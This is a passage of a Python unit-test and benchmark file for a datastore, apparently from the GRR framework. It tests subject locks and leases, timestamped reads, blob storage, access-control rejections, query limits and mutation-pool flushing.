      data_store.DBSubjectLockError,
      data_store.DB.DBSubjectLock,
      subject2,
      token=self.token)
  t2.Release()
  # Subject 1 should still be locked.
  self.assertRaises(
      data_store.DBSubjectLockError,
      data_store.DB.DBSubjectLock,
      subject,
      token=self.token)
  t1.Release()
@DBSubjectLockTest
def testDBSubjectLockLease(self):
  """Lock leases must use the configured default and be updatable."""
  default_lease = config_lib.CONFIG["Datastore.transaction_timeout"]
  # This needs to be current time or cloud bigtable server will reply with
  # deadline exceeded because the RPC is too old.
  now = int(time.time())
  with test_lib.FakeTime(now):
    with data_store.DB.DBSubjectLock(
        self.lease_row, token=self.token) as lock:
      self.assertEqual(lock.CheckLease(), default_lease)
      self.assertTrue(lock.locked)
      # Set our expiry time to now + 2*default_lease
      lock.UpdateLease(2 * default_lease)
      self.assertEqual(lock.CheckLease(), 2 * default_lease)
      # Deliberately call release twice, __exit__ will also call
      lock.Release()
  # Check setting a custom lease time
  with test_lib.FakeTime(now):
    with data_store.DB.DBSubjectLock(
        self.lease_row, token=self.token, lease_time=5000) as lock:
      self.assertEqual(lock.CheckLease(), 5000)
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiryWithExtension(self):
  """An extended lease must keep the lock past the original expiry."""
  now = int(time.time())
  # Cloud Bigtable RPC library doesn't like long, convert to int
  default_lease = int(config_lib.CONFIG["Datastore.transaction_timeout"])
  with test_lib.FakeTime(now):
    lock = data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
    # Lock expiry is stored in microseconds since epoch.
    self.assertEqual(lock.expires, int(now + default_lease) * 1e6)
    lock.UpdateLease(2 * default_lease)
    self.assertEqual(lock.expires, int(now + (2 * default_lease)) * 1e6)
  # Lock should still be active
  with test_lib.FakeTime(now + default_lease + 1):
    self.assertRaises(
        data_store.DBSubjectLockError,
        data_store.DB.DBSubjectLock,
        self.lease_row,
        token=self.token)
  # Now it is expired
  with test_lib.FakeTime(now + (2 * default_lease) + 1):
    data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiry(self):
  """A lock must block others until its lease expires, then be reacquirable."""
  now = int(time.time())
  default_lease = int(config_lib.CONFIG["Datastore.transaction_timeout"])
  with test_lib.FakeTime(now):
    lock = data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
    self.assertEqual(lock.CheckLease(), default_lease)
    self.assertRaises(
        data_store.DBSubjectLockError,
        data_store.DB.DBSubjectLock,
        self.lease_row,
        token=self.token)
  # Almost expired
  with test_lib.FakeTime(now + default_lease - 1):
    self.assertRaises(
        data_store.DBSubjectLockError,
        data_store.DB.DBSubjectLock,
        self.lease_row,
        token=self.token)
  # Expired
  after_expiry = now + default_lease + 1
  with test_lib.FakeTime(after_expiry):
    lock = data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
    self.assertEqual(lock.CheckLease(), default_lease)
    self.assertEqual(lock.expires, int((after_expiry + default_lease) * 1e6))
@DBSubjectLockTest
def testLockRetryWrapperTemporaryFailure(self):
  """Two failed attempts to get the lock, then a succcess."""
  lock = mock.MagicMock()
  # Patch out sleep so the retries are instantaneous.
  with mock.patch.object(time, "sleep", return_value=None) as mock_time:
    with mock.patch.object(
        data_store.DB,
        "DBSubjectLock",
        side_effect=[
            data_store.DBSubjectLockError("1"),
            data_store.DBSubjectLockError("2"), lock
        ]):
      lock = data_store.DB.LockRetryWrapper(
          "aff4:/something", token=self.token)
      # We slept and retried twice
      self.assertEqual(mock_time.call_count, 2)
    lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperNoBlock(self):
  """With blocking=False a held lock fails immediately without sleeping."""
  subject = "aff4:/noblocklock"
  lock = data_store.DB.DBSubjectLock(subject, token=self.token)
  with mock.patch.object(time, "sleep", return_value=None) as mock_time:
    with self.assertRaises(data_store.DBSubjectLockError):
      data_store.DB.LockRetryWrapper(
          subject, token=self.token, blocking=False)
    # No retries were attempted, so sleep was never called.
    self.assertEqual(mock_time.call_count, 0)
  lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperCompleteFailure(self):
  """The retry wrapper gives up once all retries are exhausted."""
  subject = "aff4:/subject"
  # We need to sync this delete or it happens after we take the lock and
  # messes up the test.
  data_store.DB.DeleteSubject(subject, token=self.token, sync=True)
  lock = data_store.DB.DBSubjectLock(subject, token=self.token)

  # By mocking out sleep we can ensure all retries are exhausted.
  with mock.patch.object(time, "sleep", return_value=None):
    with self.assertRaises(data_store.DBSubjectLockError):
      data_store.DB.LockRetryWrapper(subject, token=self.token)
  lock.Release()
def testTimestamps(self):
  """Check that timestamps are reasonable."""
  predicate = "metadata:predicate"
  subject = "aff4:test_timestamps"

  # Extend the range of valid timestamps returned from the table to account
  # for potential clock skew.
  start = long(time.time() - 60) * 1e6
  data_store.DB.Set(subject, predicate, "1", token=self.token)

  stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)

  # Check the time is reasonable
  end = long(time.time() + 60) * 1e6

  self.assertTrue(ts >= start and ts <= end)
  self.assertEqual(stored, "1")
def testSpecificTimestamps(self):
  """Check arbitrary timestamps can be specified."""
  predicate = "metadata:predicate"
  subject = "aff4:/test_specific_timestamps"

  # Check we can specify a timestamp
  data_store.DB.Set(subject, predicate, "2", timestamp=1000, token=self.token)
  stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)

  # The stored timestamp must be exactly the one we wrote.
  self.assertEqual(ts, 1000)
  self.assertEqual(stored, "2")
def testNewestTimestamps(self):
  """Check that NEWEST_TIMESTAMP works as expected."""
  predicate1 = "metadata:predicate1"
  predicate2 = "metadata:predicate2"

  # Write two versions of each predicate (replace=False keeps both).
  data_store.DB.Set(
      self.test_row,
      predicate1,
      "1.1",
      timestamp=10000,
      replace=False,
      token=self.token)
  data_store.DB.Set(
      self.test_row,
      predicate1,
      "1.2",
      timestamp=20000,
      replace=False,
      token=self.token)
  data_store.DB.Set(
      self.test_row,
      predicate2,
      "2.1",
      timestamp=11000,
      replace=False,
      token=self.token)
  data_store.DB.Set(
      self.test_row,
      predicate2,
      "2.2",
      timestamp=22000,
      replace=False,
      token=self.token)

  result = data_store.DB.ResolvePrefix(
      self.test_row,
      predicate1,
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)

  # Should return 2 results. Newest should be first.
  values = [x[1] for x in result]
  self.assertEqual(len(values), 2)
  self.assertListEqual(values, ["1.2", "1.1"])
  times = [x[2] for x in result]
  self.assertListEqual(times, [20000, 10000])

  result = data_store.DB.ResolvePrefix(
      self.test_row,
      predicate1,
      timestamp=data_store.DB.NEWEST_TIMESTAMP,
      token=self.token)

  # Should return 1 result - the most recent.
  self.assertEqual(len(result), 1)
  self.assertEqual(result[0][1], "1.2")
  self.assertEqual(result[0][2], 20000)

  result = list(
      data_store.DB.ResolvePrefix(
          self.test_row,
          "metadata:",
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          token=self.token))

  self.assertEqual(len(result), 4)
  self.assertListEqual([r for r in result if r[0] == "metadata:predicate1"],
                       [(u"metadata:predicate1", "1.2", 20000),
                        (u"metadata:predicate1", "1.1", 10000)])
  self.assertListEqual([r for r in result if r[0] == "metadata:predicate2"],
                       [(u"metadata:predicate2", "2.2", 22000),
                        (u"metadata:predicate2", "2.1", 11000)])

  result = list(
      data_store.DB.ResolvePrefix(
          self.test_row,
          "metadata:",
          timestamp=data_store.DB.NEWEST_TIMESTAMP,
          token=self.token))

  # Should only return the latest version.
  self.assertItemsEqual(result, [(u"metadata:predicate1", "1.2", 20000),
                                 (u"metadata:predicate2", "2.2", 22000)])
@DeletionTest
def testTimestampEdgeCases(self):
  """Writes at timestamp 0 are stored and deletable like any other."""
  row = "aff4:/row"
  attribute = "metadata:attribute"
  for i in range(4):
    # First TS is 0!
    timestamp = rdfvalue.RDFDatetime(1000 * i)
    data_store.DB.MultiSet(
        row, {attribute: [i]},
        timestamp=timestamp,
        replace=False,
        token=self.token)

  rows = data_store.DB.ResolvePrefix(
      row,
      "metadata:",
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)
  self.assertEqual(len(rows), 4)
  self.assertItemsEqual([r[2] for r in rows], [0, 1000, 2000, 3000])

  # Delete only the value written at timestamp 0.
  data_store.DB.DeleteAttributes(
      row, [attribute], start=0, end=0, token=self.token)
  rows = data_store.DB.ResolvePrefix(
      row,
      "metadata:",
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)
  self.assertEqual(len(rows), 3)
  self.assertItemsEqual([r[2] for r in rows], [1000, 2000, 3000])
def testResolvePrefix(self):
  """A prefix resolve returns the (predicate, value) pair written."""
  predicate = "metadata:predicate"
  subject = "aff4:/test_resolve_regex_prefix"

  # Check we can specify a timestamp
  data_store.DB.Set(subject, predicate, "3", token=self.token)
  results = [
      x
      for x in data_store.DB.ResolvePrefix(
          subject, "metadata:", token=self.token)
  ]

  self.assertEqual(len(results), 1)
  # Value
  self.assertEqual(results[0][1], "3")
  # Predicate
  self.assertEqual(results[0][0], predicate)
def testResolveMulti(self):
  """Test regex Multi Resolving works."""
  subject = "aff4:/resolve_multi"

  predicates = []
  predicate_values = []
  for i in range(0, 100):
    predicate = "metadata:predicate" + str(i)
    predicates.append(predicate)
    predicate_values.append("Cell " + predicate)
    data_store.DB.Set(
        subject,
        predicate,
        "Cell " + predicate,
        timestamp=1000,
        token=self.token)

  results = [
      x
      for x in data_store.DB.ResolveMulti(
          subject, predicates, token=self.token)
  ]

  self.assertEqual(len(results), 100)

  # Value
  self.assertItemsEqual(predicates, [x[0] for x in results])
  self.assertItemsEqual(predicate_values, [x[1] for x in results])

  # Now try to query for non existent predicates.
  predicates = predicates[:10]
  predicate_values = predicate_values[:10]
  for i in range(10):
    predicates.append("metadata:not_existing" + str(i))

  results = [
      x
      for x in data_store.DB.ResolveMulti(
          subject, predicates, token=self.token)
  ]

  # Only the 10 existing predicates are returned.
  self.assertEqual(10, len(results))
  self.assertItemsEqual(predicates[:10], [x[0] for x in results])
  self.assertItemsEqual(predicate_values, [x[1] for x in results])
def testBlobs(self):
  """Stored blobs exist and read back; unknown digests read as None."""
  data = "randomdata" * 50

  identifier = data_store.DB.StoreBlob(data, token=self.token)
  self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
  self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)

  # A digest that was never stored must not exist.
  empty_digest = hashlib.sha256().hexdigest()
  self.assertFalse(data_store.DB.BlobExists(empty_digest, token=self.token))
  self.assertIsNone(data_store.DB.ReadBlob(empty_digest, token=self.token))
@DeletionTest
def testBlobDeletion(self):
  """A deleted blob no longer exists and reads back as None."""
  data = "randomdata" * 50

  identifier = data_store.DB.StoreBlob(data, token=self.token)
  self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
  self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)

  data_store.DB.DeleteBlob(identifier, token=self.token)
  self.assertFalse(data_store.DB.BlobExists(identifier, token=self.token))
  self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), None)
def testAFF4BlobImage(self):
  """A BlobImage backed by a stored blob reads back the original data."""
  # 500k
  data = "randomdata" * 50 * 1024

  identifier = data_store.DB.StoreBlob(data, token=self.token)

  # Now create the image containing the blob.
  fd = aff4.FACTORY.Create(
      "aff4:/C.1235/image", standard.BlobImage, token=self.token)
  fd.SetChunksize(512 * 1024)
  fd.Set(fd.Schema.STAT())

  fd.AddBlob(identifier.decode("hex"), len(data))
  fd.Close(sync=True)

  # Chunks are written async, we have to flush here.
  data_store.DB.Flush()

  # Check if we can read back the data.
  fd = aff4.FACTORY.Open("aff4:/C.1235/image", token=self.token)
  self.assertEqual(
      fd.read(len(data)), data,
      "Data read back from aff4image doesn't match.")
  fd.Close()
def testDotsInDirectory(self):
  """Dots are special in MongoDB, check that they work in rows/indexes."""
  for directory in [
      "aff4:/C.1240/dir", "aff4:/C.1240/dir/a.b", "aff4:/C.1240/dir/a.b/c",
      "aff4:/C.1240/dir/b"
  ]:
    aff4.FACTORY.Create(
        directory, standard.VFSDirectory, token=self.token).Close()

  # We want the indexes to be written now.
  data_store.DB.Flush()

  # This must not raise.
  aff4.FACTORY.Open(
      "aff4:/C.1240/dir/a.b/c", standard.VFSDirectory, token=self.token)

  index = data_store.DB.ResolvePrefix(
      "aff4:/C.1240/dir", "index:dir/", token=self.token)
  subjects = [s for (s, _, _) in index]
  self.assertTrue("index:dir/b" in subjects)
  self.assertTrue("index:dir/a.b" in subjects)
  directory = aff4.FACTORY.Open("aff4:/C.1240/dir", token=self.token)
  self.assertEqual(2, len(list(directory.OpenChildren())))
  self.assertEqual(2, len(list(directory.ListChildren())))
# Tuning knobs for testAFF4OpenWithLock below.
OPEN_WITH_LOCK_NUM_THREADS = 10
OPEN_WITH_LOCK_TRIES_PER_THREAD = 3
OPEN_WITH_LOCK_SYNC_LOCK_SLEEP = 0.2
@test_lib.SetLabel("large")
@DBSubjectLockTest
def testAFF4OpenWithLock(self):
  """Hammers OpenWithLock from many threads and checks mutual exclusion.

  Each of OPEN_WITH_LOCK_NUM_THREADS threads repeatedly tries to open the
  same client object under lock; a shared `self.opened` flag detects any
  overlap of the critical sections.
  """
  self.opened = False
  self.client_urn = "aff4:/C.0000000000000001"

  client = aff4.FACTORY.Create(
      self.client_urn, aff4_grr.VFSGRRClient, mode="w", token=self.token)
  client.Set(client.Schema.HOSTNAME("client1"))
  client.Set(
      client.Schema.LEASED_UNTIL(rdfvalue.RDFDatetime().FromSecondsFromEpoch(
          0)))
  client.Close()

  self.open_failures = 0
  self.close_failures = 0
  self.results = []

  def ParallelThread():
    # Retry a bounded number of times; on success record the thread id and
    # exit the thread.
    for _ in xrange(self.OPEN_WITH_LOCK_TRIES_PER_THREAD):
      t = time.time()
      try:
        with aff4.FACTORY.OpenWithLock(
            self.client_urn,
            token=self.token,
            blocking=True,
            blocking_sleep_interval=self.OPEN_WITH_LOCK_SYNC_LOCK_SLEEP,
            blocking_lock_timeout=10):

          # We fail if another thread has the object already opened here.
          if self.opened:
            self.open_failures += 1
            self.fail("Double open!")

          self.opened = True
          logging.info("Thread %s holding lock for 0.5 seconds.",
                       thread.get_ident())
          time.sleep(0.5)

          # We fail if someone has closed the object while we are holding it
          # opened.
          if not self.opened:
            self.close_failures += 1
            self.fail("Double close!")

          self.results.append(thread.get_ident())

          self.opened = False
          return

      except aff4.LockError:
        # Typo fix: message previously read "retying".
        logging.info("Lock failed after %s seconds - retrying.",
                     (time.time() - t))

  # Run all contenders and wait for them to finish.
  threads = []
  for _ in range(self.OPEN_WITH_LOCK_NUM_THREADS):
    t = threading.Thread(target=ParallelThread)
    threads.append(t)

  for t in threads:
    t.start()

  for t in threads:
    t.join()

  self.assertEqual(self.open_failures, 0)
  self.assertEqual(self.close_failures, 0)

  # Make sure all threads got it eventually.
  self.assertEqual(len(self.results), self.OPEN_WITH_LOCK_NUM_THREADS)
def _InstallACLChecks(self, forbidden_access):
  """Swap in a mock security manager that forbids the given access modes."""
  if self.acls_installed:
    raise RuntimeError("Seems like _InstallACLChecks was called twice in one "
                       "test")

  self.acls_installed = True
  mock_manager = test_lib.MockSecurityManager(
      forbidden_datastore_access=forbidden_access)
  data_store.DB.security_manager = mock_manager
def _ListedMultiResolvePrefix(self, *args, **kwargs):
  """Run MultiResolvePrefix and materialize the result generator."""
  results = data_store.DB.MultiResolvePrefix(*args, **kwargs)
  return [item for item in results]
def _ListedResolveMulti(self, *args, **kwargs):
  """Run ResolveMulti and materialize the result generator."""
  results = data_store.DB.ResolveMulti(*args, **kwargs)
  return [item for item in results]
def _ListedResolvePrefix(self, *args, **kwargs):
  """Run ResolvePrefix and materialize the result generator."""
  results = data_store.DB.ResolvePrefix(*args, **kwargs)
  return [item for item in results]
def _FlushedDeleteSubject(self, *args, **kwargs):
  """Delete a subject and flush so the deletion is visible to the test."""
  # DeleteSubject is not guaranteed to be synchronous. Make sure that
  # we flush data store when testing it.
  data_store.DB.DeleteSubject(*args, **kwargs)
  data_store.DB.Flush()
def testSetChecksWriteAccess(self):
  """Set() must be rejected when write access is forbidden."""
  self._InstallACLChecks("w")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      data_store.DB.Set,
      self.test_row,
      "task:00000001",
      rdf_flows.GrrMessage(),
      token=self.token)
@DeletionTest
def testDeleteSubjectChecksWriteAccess(self):
  """DeleteSubject must be rejected when write access is forbidden."""
  self._InstallACLChecks("w")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._FlushedDeleteSubject,
      self.test_row,
      token=self.token)
def testMultiSetChecksWriteAccess(self):
  """MultiSet must be rejected when write access is forbidden."""
  self._InstallACLChecks("w")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      data_store.DB.MultiSet,
      self.test_row, {"aff4:size": [(1, 100)],
                      "aff4:stored": [("foo", 200)]},
      token=self.token)
@DeletionTest
def testDeleteAttributesChecksWriteAccess(self):
  """DeleteAttributes must be rejected when write access is forbidden."""
  self._InstallACLChecks("w")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      data_store.DB.DeleteAttributes,
      self.test_row, ["metadata:predicate"],
      sync=True,
      token=self.token)
def testMultiResolvePrefixChecksReadAccess(self):
  """MultiResolvePrefix must be rejected when read access is forbidden."""
  self._InstallACLChecks("r")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedMultiResolvePrefix, [self.test_row], ["task:"],
      token=self.token)
def testMultiResolvePrefixChecksQueryAccessWhenAccessingIndex(self):
  """Only index: prefixes require query access for MultiResolvePrefix."""
  self._InstallACLChecks("q")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedMultiResolvePrefix, [self.test_row], ["index:"],
      token=self.token)

  # A mixed prefix list touching the index is also rejected.
  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedMultiResolvePrefix, [self.test_row], ["task:", "index:"],
      token=self.token)

  # Check that simple resolve doesn't require query access.
  self._ListedMultiResolvePrefix([self.test_row], ["task:"], token=self.token)
def testResolveMultiChecksReadAccess(self):
  """ResolveMulti must be rejected when read access is forbidden."""
  self._InstallACLChecks("r")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedResolveMulti,
      self.test_row, ["task:000000001"],
      token=self.token)
def testResolveMultiChecksQueryAccessWhenAccessingIndex(self):
  """Only index: predicates require query access for ResolveMulti."""
  self._InstallACLChecks("q")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedResolveMulti,
      self.test_row, ["index:dir/foo"],
      token=self.token)

  # A mixed predicate list touching the index is also rejected.
  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedResolveMulti,
      self.test_row, ["task:00000001", "index:dir/foo"],
      token=self.token)

  # Check that simple resolve doesn't require query access.
  self._ListedResolveMulti(self.test_row, ["task:00000001"], token=self.token)
def testResolvePrefixChecksReadAccess(self):
  """ResolvePrefix must be rejected when read access is forbidden."""
  self._InstallACLChecks("r")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedResolvePrefix,
      self.test_row,
      "task:",
      token=self.token)
def testResolvePrefixChecksQueryAccessWhenAccessingIndex(self):
  """Only index: prefixes require query access for ResolvePrefix."""
  self._InstallACLChecks("q")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      self._ListedResolvePrefix,
      self.test_row,
      "index:",
      token=self.token)

  # Check that simple resolve doesn't require query access.
  self._ListedResolvePrefix(self.test_row, "task:", token=self.token)
def testResolveChecksReadAccess(self):
  """Resolve must be rejected when read access is forbidden."""
  self._InstallACLChecks("r")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      data_store.DB.Resolve,
      self.test_row,
      "task:000000001",
      token=self.token)
def testResolveChecksQueryAccessWhenAccessingIndex(self):
  """Only index: predicates require query access for Resolve."""
  self._InstallACLChecks("q")

  self.assertRaises(
      access_control.UnauthorizedAccess,
      data_store.DB.Resolve,
      self.test_row,
      "index:dir/foo",
      token=self.token)

  # Check that simple resolve doesn't require query access.
  data_store.DB.Resolve(self.test_row, "task:00000001", token=self.token)
def testLimits(self):
  """The limit= parameter caps results for all resolve variants."""
  # Create 10 rows with 10 attributes each.
  subjects = ["aff4:limittest_%d" % i for i in xrange(10)]
  attributes = ["metadata:limittest_%d" % i for i in xrange(10)]

  value_idx = 0
  for subject in subjects:
    for attribute in attributes:
      value = "value_%d" % value_idx
      value_idx += 1
      data_store.DB.Set(subject, attribute, value, token=self.token)

  # ResolvePrefix.
  for limit in [1, 2, 5, 10, 100]:
    results = data_store.DB.ResolvePrefix(
        subjects[0], "metadata:", limit=limit, token=self.token)
    self.assertEqual(len(results), min(limit, 10))

  # MultiResolvePrefix.
  for limit in [1, 2, 5, 9, 10, 11, 25, 100, 120]:
    results = dict(
        data_store.DB.MultiResolvePrefix(
            subjects, "metadata:", limit=limit, token=self.token))
    all_results = []
    for subect_res in results.itervalues():
      all_results.extend(subect_res)
    # The limit applies to the total across all subjects (100 values max).
    self.assertEqual(len(all_results), min(limit, 100))

  for limit in [1, 2, 5, 9, 10, 11, 25]:
    results = dict(
        data_store.DB.MultiResolvePrefix(
            subjects, "metadata:limittest_7", limit=limit, token=self.token))
    all_results = []
    for subect_res in results.itervalues():
      all_results.extend(subect_res)
    self.assertEqual(len(all_results), min(limit, 10))

  # ResolveMulti.
  for limit in [1, 2, 5, 9, 10, 11, 25]:
    results = list(
        data_store.DB.ResolveMulti(
            subjects[2], attributes, limit=limit, token=self.token))
    self.assertEqual(len(results), min(limit, 10))
def testApi(self):
  """The implementation's signatures must match the DataStore base class."""
  api = [
      "DeleteAttributes", "MultiDeleteAttributes", "DeleteSubject",
      "DeleteSubjects", "MultiResolvePrefix", "MultiSet", "Resolve",
      "ResolveMulti", "ResolvePrefix", "ScanAttribute", "ScanAttributes",
      "Set", "DBSubjectLock"
  ]

  implementation = data_store.DB
  reference = data_store.DataStore

  for f in api:
    implementation_spec = inspect.getargspec(getattr(implementation, f))
    reference_spec = inspect.getargspec(getattr(reference, f))
    self.assertEqual(implementation_spec, reference_spec,
                     "Signatures for function %s not matching: \n%s !=\n%s" %
                     (f, implementation_spec, reference_spec))
@DeletionTest
def testPoolDeleteSubjects(self):
  """Mutation-pool deletes only take effect after Flush()."""
  predicate = "metadata:predicate"
  data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)

  # Check it's there.
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertEqual(stored, "hello")

  pool = data_store.DB.GetMutationPool(token=self.token)
  pool.DeleteAttributes(self.test_row, [predicate])

  # Check it's still there.
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertEqual(stored, "hello")

  pool.Flush()

  # Now it should be gone.
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertIsNone(stored)
def testPoolMultiSet(self):
  """Mutation-pool writes only become visible after Flush()."""
  pool = data_store.DB.GetMutationPool(token=self.token)

  unicode_string = u"this is a uñîcödé string"
  pool.MultiSet(self.test_row, {
      "aff4:size": [1],
      "aff4:stored": [unicode_string],
      "aff4:unknown_attribute": ["hello"]
  })

  # Nothing is written before Flush() is called.
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertIsNone(stored)

  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertIsNone(stored)

  # Flush.
  pool.Flush()

  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 1)

  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, unicode_string)

  # Make sure that unknown attributes are stored as bytes.
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:unknown_attribute", token=self.token)
  self.assertEqual(stored, "hello")
  self.assertEqual(type(stored), str)
@DeletionTest
def testPoolDeleteAttributes(self):
  """Mutation-pool attribute deletes only take effect after Flush()."""
  predicate = "metadata:predicate"
  pool = data_store.DB.GetMutationPool(token=self.token)

  data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)

  # Check it's there.
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertEqual(stored, "hello")

  pool.DeleteAttributes(self.test_row, [predicate])

  # Check it's still there.
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertEqual(stored, "hello")

  pool.Flush()

  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertIsNone(stored)
class DataStoreCSVBenchmarks(test_lib.MicroBenchmarks):
  """Long running benchmarks where the results are dumped to a CSV file.

  These tests are deliberately not named with the test prefix, since they need
  to be run individually to get true performance data. Run by specifying the
  testname with --test and setting --labels=benchmark.

  The CSV output filename will be printed in a log message at the end of the
  test.
  """
  labels = ["large"]

  # What we consider as a big number of attributes.
  BIG_NUM_ATTRIBUTES = 1000

  units = "s"

  # Database counters.
  subjects = 0
  predicates = 0
  values = 0
  queries_total = 0  # Total queries.
  queries_last_timestep = 0  # Number of the queries up to the last timestep.
  steps = 0  # How many steps so far.
  query_interval = 3000  # A step is composed of this many queries.

  test_name = ""  # Current operation being run.
  start_time = None  # Wall-clock time set in setUp().
  last_time = None  # Wall-clock time of the last recorded step.
  predicate_template = "task:flow%d"  # Attribute name pattern used throughout.
def setUp(self):
  """Set up result columns, the datastore under test and the timers."""
  super(DataStoreCSVBenchmarks, self).setUp(
      ["DB Size (KB)", "Queries", "Subjects", "Predicates",
       "Values"], ["<20", "<10", "<10", "<10", "<10"])
  self.InitDatastore()
  self.start_time = time.time()
  self.last_time = self.start_time
def tearDown(self):
  """Record a final result line, dump the CSV and tear down the store."""
  self.Register(force=True)
  super(DataStoreCSVBenchmarks, self).tearDown()
  self.WriteCSV()
  self.DestroyDatastore()
def Register(self, force=False):
  """Add a new result line to the benchmark result.

  Counts one query per call; a result row is emitted every
  `query_interval` queries, or immediately when force=True.
  """
  self.queries_total += 1
  if self.queries_total % self.query_interval == 0 or force:
    data_store.DB.Flush()
    this_time = time.time()
    queries_diff = self.queries_total - self.queries_last_timestep
    self.queries_last_timestep = self.queries_total
    self.last_time = this_time
    self.steps += 1
    self.AddResult(self.test_name, this_time - self.start_time, self.steps,
                   data_store.DB.Size() / 1024, queries_diff, self.subjects,
                   self.predicates, self.values)
def WriteCSV(self, remove=False):
  """Write results to a CSV file.

  Args:
    remove: If True, delete the temporary CSV file after logging its name.
  """
  with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as fp:
    writer = csv.writer(fp, delimiter=" ")
    writer.writerow([
        "Benchmark", "Time", "DBSize", "Queries", "Subjects", "Predicates",
        "Values"
    ])
    # The first two scratchpad rows are headers/metadata, skip them.
    for row in self.scratchpad[2:]:
      writer.writerow(
          [row[0], row[1], row[3], row[4], row[5], row[6], row[7]])

    logging.info("CSV File is in %s", fp.name)
    if remove:
      os.unlink(fp.name)
def _RandomlyReadSubject(self, subject, predicates):
  """Read certain parts of a given subject.

  For each known predicate, randomly picks one of three read shapes
  (all timestamps, one timestamp, latest), then does one random
  prefix scan over the whole subject.
  """
  for j, timestamps in predicates.items():
    which = self.rand.randint(0, 2)
    if which == 0:
      # Read all timestamps.
      data_store.DB.ResolveMulti(
          subject, [self.predicate_template % j],
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          token=self.token)
    elif which == 1:
      # Read a specific timestamp.
      if timestamps:
        ts = self.rand.choice(timestamps)
        data_store.DB.ResolveMulti(
            subject, [self.predicate_template % j],
            timestamp=(ts, ts),
            token=self.token)
    elif which == 2:
      # Read latest.
      data_store.DB.Resolve(
          subject, self.predicate_template % j, token=self.token)
    self.Register()
  which = self.rand.randint(0, 1)
  if which == 0:
    # Find all attributes.
    data_store.DB.ResolvePrefix(
        subject,
        "task:flow",
        timestamp=data_store.DB.NEWEST_TIMESTAMP,
        token=self.token)
  elif which == 1:
    # Find all attributes with a prefix reducible regex.
    data_store.DB.ResolvePrefix(
        subject,
        "task:",
        timestamp=data_store.DB.NEWEST_TIMESTAMP,
        token=self.token)
  self.Register()
def _ReadRandom(self, subjects, fraction, change_test=True):
  """Randomly read the database.

  Reads approximately `fraction` percent of the subjects, sampled
  with replacement.
  """
  if change_test:
    self.test_name = "read random %d%%" % fraction
  for _ in range(0, int(float(len(subjects)) * float(fraction) / 100.0)):
    i = self.rand.choice(subjects.keys())
    subject = subjects[i]["name"]
    predicates = subjects[i]["attrs"]
    self._RandomlyReadSubject(subject, predicates)
def _UpdateRandom(self, subjects, fraction, change_test=True):
  """Update values/predicates for a given fraction of the subjects.

  For each selected subject randomly either rewrites/extends existing
  predicates (which in {0, 1}) or adds a brand new predicate (which == 2),
  keeping the in-memory bookkeeping dict and counters in sync with the DB.
  """
  if change_test:
    self.test_name = "update %d%%" % fraction
  new_value = os.urandom(100)
  for i in subjects:
    subject = subjects[i]["name"]
    predicates = subjects[i]["attrs"]
    if self.rand.randint(0, 100) > fraction:
      continue
    which = self.rand.randint(0, 2)
    if which == 0 or which == 1:
      for j, timestamp_info in predicates.items():
        number_timestamps = len(timestamp_info)
        if which == 0 and len(timestamp_info):
          # Update one timestamp'ed value.
          data_store.DB.Set(
              subject,
              self.predicate_template % j,
              new_value,
              timestamp=timestamp_info[-1],
              token=self.token)
          self.Register()
        elif which == 1:
          # Add another timestamp.
          timestamp_info.append(100 * number_timestamps + 1)
          data_store.DB.Set(
              subject,
              self.predicate_template % j,
              new_value,
              replace=False,
              timestamp=timestamp_info[-1],
              token=self.token)
          self.values += 1
          self.Register()
    elif which == 2:
      # Add an extra predicate.
      j = len(predicates)
      number_timestamps = self.rand.randrange(1, 3)
      ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
      predicates[j] = ts
